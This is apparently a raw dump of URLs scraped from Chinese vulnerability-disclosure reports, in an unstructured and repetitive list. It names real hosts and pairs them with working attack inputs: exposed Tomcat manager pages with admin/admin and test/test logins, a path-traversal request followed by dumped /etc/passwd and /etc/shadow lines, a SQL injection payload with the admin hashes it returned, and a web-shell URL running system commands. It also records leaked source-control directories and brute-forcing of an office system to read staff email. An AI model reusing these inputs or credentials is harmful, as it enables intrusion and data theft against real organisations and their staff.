http://58.57.168.171:8088/manager/html http://116.1.207.15:8003/manager/html http://218.201.63.166:8888/manager/html http://222.223.124.48:8001/manager/html http://61.163.103.86:8000/manager/html http://112.25.215.179:88/manager/html http://61.191.24.171:8888/manager/html http://118.122.122.252:8080/manager/html http://58.211.254.123:8080/manager/html http://218.65.236.71:88/manager/html http://60.209.29.213/manager/html http://59.46.163.20:8081/manager/html http://oa.hangyjx.com/manager/html http://218.93.178.211:1010/manager/html http://211.161.4.214/manager/html http://powerstarups.uicp.cn/manager/html http://powerstarups.uicp.net/manager/html http://60.22.154.66:8080/manager/html http://183.203.150.20:8000/manager/html http://59.46.163.20:8081/manager/html http://59.46.161.202:8080/manager/html http://222.168.33.62:81/manager/html http://58.30.78.228/manager/html http://111.206.198.201/manager/html http://211.99.249.66:8080/manager/html http://60.10.197.25:8080/manager/html http://218.25.158.24:8090/manager/html http://59.175.193.250:8080/manager/html http://59.46.124.99:8080/manager/html http://218.106.246.132:8080/manager/html http://60.10.64.205:8080/manager/html http://183.166.57.31:8090/manager/html http://60.191.122.186:8888/manager/html http://221.192.206.27:8090/manager/html http://124.163.218.92:81/manager/html http://122.156.165.134:8080/manager/html http://61.163.55.47:8888/manager/html http://218.24.144.80:8888/manager/html http://218.24.172.158:8080/manager/html http://58.241.129.182:8080/manager/html http://101.68.68.194:8080/manager/html http://222.219.118.120:8080/manager/html http://222.128.25.190:8080/manager/html http://222.128.25.190:8080/manager/html http://www.mccyck.cn:8080/manager/html http://fortunesroll.com/manager/html http://59.173.241.30:8080/manager/html http://222.173.43.19:8081/manager/html http://oa.jtv.com.cn/manager/html http://oa.bjkgtz.net:8080/manager/html http://oa.bjkgtz.net:8080/manager/html http://www.fortunesroll.com/manager/html http://60.190.134.254:8080/manager/html http://oa.essca.com/manager/html http://124.205.40.202:88/manager/html http://218.94.43.114:8888/manager/html http://113.16.175.170:8008/manager/html http://shanxi.sinosteel.com:8888/manager/html http://111.160.204.56:80/manager/html http://219.148.83.173:80/manager/html http://s-60560.gotocdn.com:8888/manager/html http://oa.scxxt.com.cn/manager/html http://**.**.**.**/cn/index.php?pid=1 http://yjy.zdjyw.net.cn/system/systemnotice/notice.action?id=6539存在命令执行漏洞 ftp://111.11.28.49/考试系统部署文档.docx http://picooc.com/.svn/entries http://bbs.picooc.com/.svn/entries http://vwww.picooc.com/.svn/entries http://ww2.picooc.com/.svn/entries http://vww.picooc.com/.svn/entries http://www.bbs.picooc.com/.svn/entries http://sss.picooc.com/.svn/entries http://picooc-latin_www.picooc.com/.svn/entries http://ftp.picooc.com/.svn/entries http://wwaw.picooc.com/.svn/entries http://www.picooc.com_www.picooc.com/.svn/entries http://www.statistics.picooc.com/.svn/entries http://mial.picooc.com/.svn/entries http://email.picooc.com/.svn/entries http://weww.picooc.com/.svn/entries http://weixin.cnooc.com.cn/ http://www.picooc.com:80/ www.picooc.com http://110.249.219.99:7700/RS22/userLogin!toLogin.action?subSysId=7&loginTitle=%E5%B8%82%E5%B1%80%E8%A1%A5%E8%80%83存在命令执行漏洞 http://www.hneao.cn/yx/ysks/yx_kdyxfack.aspx?kddm=203&zylbdm=01存在注入 http://211.94.145.63:7001/menu/index.jsp http://**.**.**//Adminiscentertrator/AdmLinkInsert.asp_ http://**.**.**/Adminiscentertrator/AdmLinkInsert.asp_ http://**.**.**/Adminiscentertrator/AdmLinkInsert.asp_ http://**.**.**/Adminiscentertrator/AdmLinkInsert.asp_ http://**.**.**/Adminiscentertrator/AdmLinkInsert.asp_ http://**.**.**/Adminiscentertrator/AdmLinkInsert.asp_ http://**.**.**/Adminiscentertrator/AdmLinkInsert.asp_ http://**.**.**/Adminiscentertrator/AdmLinkInsert.asp_ http://**.**.**/Adminiscentertrator/AdmLinkInsert.asp_ http://**.**.**//Adminiscentertrator/AdmLinkInsert.asp_ http://**.**.**//**.**.**.**/Adminiscentertrator/AdmLinkInsert.asp_ http://**.**.**/Adminiscentertrator/AdmLinkInsert.asp_ http://**.**.**//Adminiscentertrator/AdmLinkInsert.asp_ http://**.**.**//Adminiscentertrator/AdmLinkInsert.asp_ http://**.**.**/Adminiscentertrator/AdmLinkInsert.asp_ http://**.**.**/Adminiscentertrator/AdmLinkInsert.asp_ http://**.**.**/Adminiscentertrator/AdmLinkInsert.asp_ http://**.**.**/Adminiscentertrator/AdmLinkInsert.asp_ http://**.**.**//Adminiscentertrator/AdmLinkInsert.asp_ http://**.**.**/Adminiscentertrator/AdmLinkInsert.asp_ http://**.**.**//Adminiscentertrator/AdmLinkInsert.asp_ http://**.**.**/job//Adminiscentertrator/AdmLinkInsert.asp_ http://**.**.**/Adminiscentertrator/AdmLinkInsert.asp_ http://**.**.**//Adminiscentertrator/AdmLinkInsert.asp_ ftp://218.58.70.160 www.hegouvip.com http://my.ikang.com/packageDetail?packageid=425919&cardnumber=0010900090130722 http://my.ikang.com/packageDetail?packageid=425919&cardnumber=0010900090930722 http://my.ikang.com/packageDetail?packageid=425919&cardnumber=0010900090730722 http://wooyun.org/bugs/wooyun-2015-0111690 http://**.**.**.**/tzptweb/webpages/article_list_page.aspx http://**.**.**.**/webpages/article_list_page.aspx http://gonghui.shmetro.com:8080/shentong-union/login http://club.xywy.com/ask_success.php?type=bindphone http://www.gesafe.com/xintuo/xt_GongSi.aspx?id=31 http://**.**.**.**/bugs/wooyun-2010-078095 http://**.**.**.**:8002/WidgetsHandler.ashx?widget=1 http://**.**.**.**/WidgetsHandler.ashx?widget=1 http://**.**.**.**/WidgetsHandler.ashx?widget=1 http://**.**.**.**/WidgetsHandler.ashx?widget=1 http://**.**.**.**/WidgetsHandler.ashx?widget=1 http://**.**.**.**/WidgetsHandler.ashx?widget=1 http://**.**.**.**/WidgetsHandler.ashx?widget=1 http://**.**.**.**/WidgetsHandler.ashx?widget=1 http://www.danmu.com/api/play http://www.scal.com.cn/invite2011/admin/Admin_Invite.aspx http://m.haolyy.com/web/showmember/appcatview?categoryId1=10 www.fesco.com.cn www.fesco.com.cn http://group.swoole.com/search/ajax/search_result/search_type-all__q-Module%20'pcntl'%20already%20loaded__template-__page-2 http://220.250.65.185/Index.aspx http://travel.xiamenair.com/Travel/Domestic.html?start=%7Cundefined&end=%25u53A6%25u95E8%7CXMN http://**.**.**/iSite/login.jsp http://222.83.251.40/logonAction.do http://222.83.251.40/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../../ http://222.83.251.40/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../../WEB-INF/ index.php/System/Model/getData http://www.chaojibiaoge.com:80/ www.chaojibiaoge.com http://61.182.242.18:8080/ http://61.183.151.86:81/ http://61.164.84.70:8080/ http://58.64.211.92:8080/ http://58.211.149.138:81/ http://58.240.92.219/ http://59.33.36.234:8080/ http://60.12.220.103:8000/ http://wuliu.swust.edu.cn http://kmras.pinlivefoods.com:8130 http://whlc.kmras.com:9000/ http://www.superfly.cn:8088/ http://tianyicnc.meibu.com:800/ http://cqdh.kmras.com/ http://www.ydqx.cn/ http://ras.shekou.cmhk.com/ http://cmpd.shekou.cmhk.com/ http://www.xbzx.ynu.edu.cn/DownLoad/Show.aspx?id=64 http://xcd.xeeyu.net/UserLogin.aspx https://github.com/xiongmeng/libs/blob/df4dfc4373f5b96470827ab118a9ed77a3ebc46a/Sports/Log/LogWBY/Log4php/Appender/LogMail.php ftp://125.76.237.71/ ftp://125.76.237.71/c_member.txt http://wsdj.saic.gov.cn/saicetpsweb/webLogin.do?method=checkWebApplyProposer http://61.134.118.34/logonAction.do http://61.134.118.34/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../../ hammerhead:/data/data/com.baidu.input/files/land http://ms.csdn.net/proxy/search_tags?SessionID=SESSIONID-ST-85274-Rjh15DiTsacQp9ybRuef-passport.csdn.net&word=a&size=50 http://api.passport.xywy.com/n_userHeaderGet.php?callback=1&a=u&uid=60356754 http://v.huatu.com/newhome/datum.php?action=lecture&type=v http://www.saic.gov.cn/ywbl/zxcx/djqyxxcx/index.html http://gzhd.saic.gov.cn:8281/other/chaxun/listQyName.jsp http://www.g-emall.com/ http://search.nm.zsks.cn/也不知道有啥,懒得继续跑了,毕竟招生信息。。。。高考的孩子不容易 URL:http://fast.ele.me:89/login.do com:211.94.145.96 http://211.94.145.96:10000/manager/html http://wooyun.org/bugs/wooyun-2010-0117338 http://202.207.247.44/urp.zip http://www.ruijie.com.cn/ http://223.220.248.3/index.htm http://221.213.54.66/index.htm http://219.139.148.126/index.htm http://60.19.64.146/index.htm http://125.67.7.2/index.htm http://202.103.10.214/index.htm http://58.18.131.200/index.htm http://175.174.62.25/index.htm http://58.254.92.130/index.htm http://58.18.163.190/index.htm http://117.132.9.226/index.htm http://119.255.22.13/index.htm http://211.154.11.246/index.htm http://221.203.77.234/index.htm http://120.209.15.197:8888/index.htm http://61.131.82.228:8080/index.htm http://221.202.167.17:8080/index.htm http://202.115.254.26/index.htm http://1.30.21.42/index.htm http://218.65.220.99:9090/index.htm http://221.213.54.66/index.htm为例: http://221.213.54.66/cache.htm http://ued.suning.com/survey/express/d1lvZ1lT http://popo.wan.ijinshan.com/.git/config http://popo.wan.ijinshan.com/.git/ http://m.qucai.com/information/news_view.aspx?ID=24 http://u.muzhiwan.com/1 http://www.88box.com:80/ www.88box.com http://218.107.60.60/ http://u.muzhiwan.com/ http://tc.homelink.com.cn/,超级经纪人大赛 http://zoo.e-tobe.com/news.php?id=1 http://122.13.76.111:8888/woo-mina/login.jsp http://122.13.76.111:8888 http://114.251.3.99/hxjy/initPage.action http://www.zili.cn/ http://www.95505.com.cn/b2a/saleNewCar/proposalView.do?id=0903530080720150000055 http://www.95505.com.cn/b2a/saleNewCar/proposalView.do?id=0674636080720150000028 http://www.95505.com.cn/b2a/saleNewCar/proposalView.do?id=0643233080720150000976 http://www.cnbeta.com/articles/286217.htm http://www.eshimin.com/pages/account/resetpsd/resetPsdIndex.jsp http://www.xiaolajiao.com/robots.txt http://faq.xiaolajiao.com/从这说起 http://faq.xiaolajiao.com/?question/ajaxsearch/sst https://github.com/chenhongbao/adminsys/blob/b081e6182f1a8226476a8ac8f7a03d023c55e9b1/web/xml/email.config.xml site:51yund.com,看看有没有新站点可以入手,发现一个新站点 http://test-jiaolian1.51yund.com/me/index http://jiaolian.51yund.com/me/index http://jiaolian.51yund.com/ask/askDetail/id/2304 http://jiaolian.51yund.com/member/instructor/id/12476760 http://jiaolian.51yund.com/ask/answerDetail/id/8 https://github.com/laolang81/food/blob/2312771af5555d6b9c81c17fb1564be024adbe76/config/properties/mail.properties https://github.com/sonyfe25cp/dlde-parent/blob/325325799276e2385d4fb2ff8d23de2d3916c1d2/dlde-commons/src/test/java/utils/EmailSender.java http://www.chaojibiaoge.com/index.php/Oa/Project/viewContent/id/3221/sharekey/f2k860y4 http://jiaolian.51yund.com/me/coachAttest http://jiaolian.51yund.com/me/uploadVideo http://jiaolian.51yund.com/member/instructor/id/2903 http://jiaolian.51yund.com/video/detail/id/2988 http://jiaolian.51yund.com/ask/create https://github.com/jasonlvhit/fuck-B2C/blob/aea5bd6a15d2d63025806b40289bc04f94420f2e/B2C/views.py www.yihu.com www.citytalk.tw/bbs/uc_server/avatar.php?size=small&uid= home.fang.com/user/login.aspx这个是搜房网旗下的一个登陆系统,登陆的地方没有验证码限制 http://wap.cnmo.com/doc_tail.php?docid=257997 http://wap.cnmo.com/doc_tail.php?docid=257997 http://222.74.1.146:8080/nmcindex/ http://3gfs.net/order.php?id=192&type=zdq&num=1&tc=48&mstr=detail&mark=&shid= http://3gfs.net/img/id_pic/20150630164320.php?a=assert&b=phpinfo%28%29 http://3gfs.net/img/id_pic/20150630164320.php?a=system&b=dir http://**.**.**.**/bugs/wooyun-2010-0104541 http://**.**.**.**/Chinese/Bs_DownloadShow.asp?Bs_DownID=46 http://**.**.**.**/Chinese/Bs_DownloadShow.asp?Bs_DownID=120 http://**.**.**.**/Chinese/Bs_DownloadShow.asp?Bs_DownID=42 http://**.**.**.**/Chinese/bs_DownloadShow.asp?Bs_DownID=28 http://**.**.**.**/Chinese/bs_DownloadShow.asp?Bs_DownID=43 http://**.**.**.**/Chinese/Bs_Download.asp?Bs_BigClassName=%CD%BC%D0%CE%CD%BC%CF%F1 http://www.**.**.**.**/Chinese/Bs_Download.asp?Bs_BigClassName=%B9%AB%CB%BELOGO http://**.**.**.**/Chinese/Bs_Download.asp?Bs_BigClassName=%D3%A6%D3%C3%C8%ED%BC%FE http://**.**.**.**/Chinese/Bs_Download.asp?Bs_BigClassName=%CD%F8%C2%E7%B0%B2%C8%AB http://**.**.**.**/Chinese/Bs_Download.asp?Bs_BigClassName=%D0%D0%D2%B5%C8%ED%BC%FE http://**.**.**.**/Chinese/Bs_jishuProductShow.asp?ArticleID=299 http://**.**.**.**/Chinese/Bs_jishuProductShow.asp?ArticleID=50 http://**.**.**.**/Chinese/Bs_jishuProductShow.asp?ArticleID=48 http://**.**.**.**/chinese/Bs_jishuProductShow.asp?ArticleID=69 http://218.26.102.61/ http://www.chaojibiaoge.com/index.php/Index/index http://www.chaojibiaoge.com/index.php/Home/Index/forgetPassword http://www.f-young.cn/ http://web3.17500.cn/800/nr.php?id=27 http://web2.17500.cn/800/nr.php?id=27 http://web1.17500.cn/800/nr.php?id=27 http://17500.cn/800/nr.php?id=27 https://61.235.38.122/09/index.php https://61 http://59.32.204.234:8084/sgjgyjfb/scindex.action?scName=存在命令执行漏洞 www.dpex.com.tw www.muzhiwan.com/index.php?action=album&aid=我是注入点&opt=getuserupdate www.muzhiwan.com www.muzhiwan.com http://www.next-energy.com.cn/ http://www.xtrs.gov.cn/xtzj/new/unitPicUpload http://www.xtrs.gov.cn/xtzj//new/unitPicFile?unitPicFileName=13532928829532 http://www.xtrs.gov.cn/xtzj/new/unitPicFile?unitPicFileName=../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash ntp:x:38:38::/etc/ntp:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin huawei1:x:500:500::/home/huawei1:/bin/bash oracle:x:501:502::/home/oracle:/bin/bash http://www.xtrs.gov.cn/xtzj/new/unitPicFile?unitPicFileName=../../../../../etc/shadow zfplrtUm3sKnl1:15454:0:99999:7 UVFx7qNesYgn0sr5J2dvO0:16443:0:99999:7 http://www.xtrs.gov.cn/xtzj/new/unitPicFile?unitPicFileName=../../../../../etc/hosts http://www.xtrs.gov.cn/xtzj/new/unitPicFile?unitPicFileName=../../../../../root/.bash_history jdbc:oracle:thin:@10.141.136.58:1521:hygeia jdbc:oracle:thin:@172.18.100.108:1521:develop jdbc:oracle:thin:@localhost:1521:orcl jdbc:oracle:thin:@10.141.136.38:1521:czwebcx http://space.caijing.com.cn/.svn/entries http://ucenter.caijing.com.cn/.svn/entries http://www.bnu.edu.cn/ http://szxy.bnu.edu.cn/ http://badmi.qiye001.com/action/mod-android/videoDetailM.action?videoId=707存在命令执行漏洞 http://**.**.**.**/demo/ http://project.weiphp.cn http://project.weiphp.cn/weishi/index.php?s=/addon/WeiSite/WeiSite/index/token/gh_fd7d36352d19/openid/orgF0t29_TBY****qfU.html http://project.weiphp.cn/weishi/index.php?s=/addon/CustomReply/CustomReply/lists.html http://project.weiphp.cn/weishi/index.php?s=/addon/CustomReply/CustomReply/lists/token/gh_fd7d36352d19.html http://**.**.**/pureportal/homepage/gotoHomepage.action http://www.muzhiwan.com/index.php?action=profile&opt=ForgotPassword http://asiantag.com/English/Bs_ProductShow.asp?ArticleID=123 http://en.dgzf.com.cn/English/Bs_ProductShow.asp?ArticleID=228 http://www.zjxzgm.com/english/Bs_ProductShow.asp?ArticleID=305 http://www.whxfgm.com/english/Bs_ProductShow.asp?ArticleID=520 http://www.gdlida.cn/English/Bs_ProductShow.asp?ArticleID=23 http://shequ.fang.com/shop/manager/BangLogin.aspx?city=dl这个是搜房网旗下的社区帮网站,可以看到登陆页面没有验证码 http://oa.cnpsec.com/indishare/office.nsf/%28frame%29/index,此处可进行爆破,得到某个可用账号后,看到右下角有“用户须知”,里面写着“默认的用户登陆名为用户名字拼音全拼,默认密码为‘111111’”,进入后能够查看中邮证券公司全部员工联系方式,用里面获取的通讯录做成拼音字典,跑出不少账号,账号均能进入办公自动化系统,浏览各种信息,里面包含不少敏感信息。能够进入邮箱查看邮件,查看了一两个邮箱就找到了不少身份信息,未一一查看其他邮箱。 https://github.com/22211127/new72/blob/45079eed2e7b7980455ed349807f698eb4368abf/Fillin1.js http://ebuy.gd.chinamobile.com/estoreSys/login.jsp url:59.175.231.124 http://app.hi.tiancity.com/WEB-INF/web.xml http://app.hi.tiancity.com//WEB-INF/classes/log4j.properties http://**.**.**.**/mainpage/msglog.aspx?user=1 http://**.**.**.**/mainpage/msglog.aspx?user=1 http://**.**.**.**/mainpage/msglog.aspx?user=1 http://**.**.**.**/mainpage/msglog.aspx?user=1 http://**.**.**.**/mainpage/msglog.aspx?user=1 http://**.**.**.**/mainpage/msglog.aspx?user=1 http://**.**.**.**//mainpage/msglog.aspx?user=1 http://**.**.**.**:8888/mainpage/msglog.aspx?user=1 http://**.**.**.**/mainpage/msglog.aspx?user=1 http://**.**.**.**/mainpage/msglog.aspx?user=1 http://**.**.**.**/mainpage/msglog.aspx?user=1 http://**.**.**.**/mainpage/msglog.aspx?user=1 http://**.**.**.**/mainpage/msglog.aspx?user=1 http://**.**.**.**/mainpage/msglog.aspx?user=1 http://**.**.**.**:81/mainpage/msglog.aspx?user=1 http://**.**.**.**/mainpage/msglog.aspx?user=1 http://**.**.**.**/mainpage/msglog.aspx?user=1 http://**.**.**.**:89/mainpage/msglog.aspx?user=1 http://jm.leyou.com.cn/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa\%27and+char%28@%60%27%60%29+/*!50000Union*/+/*!50000SeLect*/+1,2,3,concat%280x3C6162633E,group_concat%280x7C,userid,0x3a,pwd,0x7C%29,0x3C2F6162633E%29,5,6,7,8,9%20from%20%60%23@__admin%60%23%22 admin:f297a57a5a743894a0e4|,|leyou:1e969e759bca932e03df http://jm.leyou.com.cn/web_admin/ http://usercenter.ccibs.cn/claimUser!queryClaims.action?r=1¤tPage=8002存在命令执行漏洞 http://haikehui.haierhouse.com/dkt/webhkh/webCommonAction!goHome.do https://github.com/qianshihua/fujian_order_core/blob/9e39fb239dbcaa0c8b7f4a35e4ba2053db8d9119/gx-uni-order/src/main/webapp/WEB-INF/velocity/order/Handle.vm http://esales.10010.com/ http://www.zgxhnyfw.com/Chinese/Bs_jishu.asp?BigClassName=%B4%F3%CC%EF http://www.ahxhnyfw.com/Chinese/Bs_jishu.asp?BigClassName=%B2%A1%BA%A6 http://www.flycom.cn/Chinese/Bs_jishu.asp?BigClassName=%B4%F3%CC%EF http://www.jsxhnyfw.com/Chinese/Bs_jishu.asp?BigClassName=%BB%AF%B7%CA http://www.lnxhnyfw.com/chinese/Bs_jishu.asp?BigClassName=%D0%F3%C4%C1 http://www.zhizunlm.com/zhizunlm.rar ftp://211.157.143.182/ http://61.178.81.162:8888/LQL_OA/login.aspx# https://github.com/ppm10103/MySQLJavaBinlogReplicater/blob/8f9d2f18674dc5c8da1db9f52e398eb4e574f55b/src/cn/ce/utils/mail/Alarm.java http://www.class.cn:80/ www.class.cn ftp://223.4.245.109/web/web/Web.config http://www.ci123.com:80/ www.ci123.com http://myi.vip.com/userbind.html http://**.**.**.**/demo/ http://**.**.**.**/ http://www.guozi.org.cn/web.rar http://user.app.xywy.com/ajax/sendMail.php http://**.**.**.**/bugs/wooyun-2015-0108778而发 http://**.**.**.**/comm_front/public_info/content_channel_list.jsp?class_id=104&class_name=所有信息&pager.offset=150&pager.desc=true http://**.**.**.**/comm_front/public_info/content_channel_list.jsp?class_id=1&class_name=%CB%F9%D3%D0%D0%C5%CF%A2 http://**.**.**.**/comm_front/public_info/content_channel_list.jsp?class_id=73&class_name=%D6%B1%CA%F4%BB%FA%B9%B9 http://**.**.**.**/comm_front/public_info/content_channel_list.jsp?class_id=18&class_name=%C8%CB%CA%C2%D0%C5%CF%A2 http://**.**.**.**/comm_front/public_info/content_channel_list.jsp?class_id=1&class_name=%CB%F9%D3%D0%D0%C5%CF%A2 http://**.**.**.**/comm_front/public_info/content_channel_list.jsp?class_id=18&class_name=人事信息&pager.offset=100&pager.desc=true http://**.**.**.**/comm_front/public_info/content_channel_list.jsp?class_id=18&class_name=人事信息&pager.offset=100&pager.desc=true http://**.**.**.**/comm_front/baixian/tpgl.jsp?chid=9076&org_id=139 http://**.**.**.**/comm_front/baixian/tpgl.jsp?chid=9076&org_id=139 http://**.**.**.**/comm_front/baixian/tpgl.jsp?chid=9076&org_id=139 http://**.**.**.**/comm_front/baixian/tpgl.jsp?chid=9076&org_id=139 http://**.**.**.**/comm_front/baixian/tpgl.jsp?chid=9076&org_id=139 http://**.**.**.**/comm_front/baixian/tpgl.jsp?chid=9076&org_id=139 http://**.**.**.**/comm_front/baixian/tpgl.jsp?chid=9076&org_id=139 http://123.127.164.54:8088/oa/login.action存在命令执行漏洞 url:http://59.172.182.106:80/manager/html user:admin pass:admin http://shiep.ct-edu.com.cn/learning/entity/first/peTchCoursewareItem_enterTy.action http://yibo.iyiyun.com/Home/Index/getAdList?keywordIds=&page=1&size_id=10&title=1 http://wechat.m.xywy.com/Index/getIll?departid=1 Component:com.UCMobile/com.alipay.sdk.app.H5PayActivity https://mclient.alipay.com/cashierRoutePay.htm http://103.39.77.117/ http://103.39.77.117/3.asp http://www.ztegota.com.cn/,中兴高达 http://www.ztegota.com.cn/sysadmin/login.aspx,kingtopcms,试下admin/toprand,直接就进去了: URL:http://subadmin.cnmo.com http://f.lashou.com/spLogin.php http://111.13.51.105:8080/ http://www.snnu.edu.cn/default.php https://sslvpn.snnu.edu.cn/por/login_psw.csp http://oa.snnu.edu.cn/Home/Login http://door.snnu.edu.cn/Home/Index http://hqdt.snnu.edu.cn/sms http://m.leyou.com.cn/ http://www.muzhiwan.com/index.php?action=article&opt=comment_list 1.www.muzhiwan.com/index.php?action=article&opt=comment_list post:aid=&num=1 2.www.muzhiwan.com/index.php?.exe&action=common&opt=speeddownpc&vid= 3.www.muzhiwan.com/index.php 4.www.muzhiwan.com/index.php?action=common&opt=speeddown&vid= 5.www.muzhiwan.com/index.php?action=game&opt=getAjaxComment post:num=1&vid= http://gsv.muzhiwan.com/index.php?action=detail&opt=getAjaxComment post:num=1&sid= http://i.waimai.meituan.com/ajax/account/getRegisterCode http://www.zhiyingdai.com/receivePassWord/receivepassword_step1.jsp https://github.com/qianshihua/terminal-shopping/blob/0dde85d8bf0212a7377e5df5f315832e6410121d/terminal-shopping/terminal-shopping-web-admin/buLu/DataEntry_HN/document/ZJ_ESS.t http://cqetc.chinasofti.com/list.php?c=8 http://redmine.91jinrong.com/ http://lmc.91jinrong.com http://www.91dk.com/ http://www.edai100.com/login/index http://dai-admin-xianzhi.dai68.com/login http://flow.91jinrong.com/login http://cpa.31591.com/login.html http://chexian.31591.com/ http://xuaixu.com/ http://chexian.91jinrong.com/ http://union.91jinrong.com/admin http://bigdata.91jinrong.com http://zzb-admin.91jinrong.com/login http://zzb-admin.91jinrong.com/login http://t.91dk.com/ http://www.newbillion.cn/ http://www.zitian.cn https://www.dnspod.cn/ www.boqii.com/userinfo/User/delAddress/id/736958 http://221.213.100.149/Login url:http://211.152.53.24:80/manager/html user:test pass:test http://211.152.53.24/analytics/struts2/dataonlineLogin.action inurl:contview.aspx?id= http://**.**.**.**/students/ClassInfo.aspx?cls_no= http://**.**.**.**/students/ClassInfo.aspx?cls_no= http://**.**.**.**/students/ClassInfo.aspx?cls_no= http://**.**.**.**/students/ClassInfo.aspx?cls_no= http://**.**.**.**/students/ClassInfo.aspx?cls_no= http://**.**.**.**/students/ClassInfo.aspx?cls_no= http://**.**.**.**/WEB/LearnResource/CouresWareList.aspx?crs_no=0102 http://**.**.**.**/WEB/LearnResource/CouresWareList.aspx?crs_no=0102 http://**.**.**.**/WEB/LearnResource/CouresWareList.aspx?crs_no=0102 http://**.**.**.**/WEB/LearnResource/CouresWareList.aspx?crs_no=0102 http://**.**.**.**/WEB/LearnResource/CouresWareList.aspx?crs_no=0102 http://**.**.**.**/WEB/LearnResource/CouresWareList.aspx?crs_no=0102 http://**.**.**.**/CaiStudy.aspx?cls_no=000001&cai_no=KJ000014 http://**.**.**.**/CaiStudy.aspx?cls_no=000001&cai_no=KJ000014 http://**.**.**.**/CaiStudy.aspx?cls_no=000001&cai_no=KJ000014 http://**.**.**.**/CaiStudy.aspx?cls_no=000001&cai_no=KJ000014 http://**.**.**.**/CaiStudy.aspx?cls_no=000001&cai_no=KJ000014 http://**.**.**.**/CaiStudy.aspx?cls_no=000001&cai_no=KJ000014 http://**.**.**.**/Admin/StudyExam/StuMessageList.aspx?cls_no=XM000014 http://**.**.**.**/Admin/StudyExam/StuMessageList.aspx?cls_no=XM000014 http://**.**.**.**/Admin/StudyExam/StuMessageList.aspx?cls_no=XM000014 http://**.**.**.**/Admin/StudyExam/StuMessageList.aspx?cls_no=XM000014 http://**.**.**.**/Admin/StudyExam/StuMessageList.aspx?cls_no=XM000014 http://**.**.**.**/Admin/StudyExam/StuMessageList.aspx?cls_no=XM000014 http://**.**.**.**/WEB/message/msgList.aspx?module=2&ptypeid=1 http://**.**.**.**/WEB/message/msgList.aspx?module=2&ptypeid=1 http://**.**.**.**/WEB/message/msgList.aspx?module=2&ptypeid=1 http://**.**.**.**/WEB/message/msgList.aspx?module=2&ptypeid=1 http://**.**.**.**/WEB/message/msgList.aspx?module=2&ptypeid=1 http://**.**.**.**/WEB/message/msgList.aspx?module=2&ptypeid=1 http://**.**.**.**/WEB/DataStat/LearnRecordDetails.aspx?mod=trainproject&cls_no= http://**.**.**.**/WEB/DataStat/LearnRecordDetails.aspx?mod=trainproject&cls_no= http://**.**.**.**/WEB/DataStat/LearnRecordDetails.aspx?mod=trainproject&cls_no= http://**.**.**.**/WEB/DataStat/LearnRecordDetails.aspx?mod=trainproject&cls_no= http://**.**.**.**/WEB/DataStat/LearnRecordDetails.aspx?mod=trainproject&cls_no= http://**.**.**.**/WEB/DataStat/LearnRecordDetails.aspx?mod=trainproject&cls_no= http://**.**.**.**/Admin/Policy/PolicyDownload.aspx?PolicyId=8 http://**.**.**.**/Admin/Policy/PolicyDownload.aspx?PolicyId=8 http://**.**.**.**/Admin/Policy/PolicyDownload.aspx?PolicyId=8 http://**.**.**.**/Admin/Policy/PolicyDownload.aspx?PolicyId=8 http://**.**.**.**/Admin/Policy/PolicyDownload.aspx?PolicyId=8 http://**.**.**.**/Admin/Policy/PolicyDownload.aspx?PolicyId=8 http://**.**.**.**/students/ModifyStuRegInfo.aspx?id=528&cls_no=XM000038&Ctype=1&cls_name=人事系统操作培训班 http://**.**.**.**/students/ModifyStuRegInfo.aspx?id=528&cls_no=XM000038&Ctype=1&cls_name=人事系统操作培训班 http://**.**.**.**/students/ModifyStuRegInfo.aspx?id=528&cls_no=XM000038&Ctype=1&cls_name=人事系统操作培训班 http://**.**.**.**/students/ModifyStuRegInfo.aspx?id=528&cls_no=XM000038&Ctype=1&cls_name=人事系统操作培训班 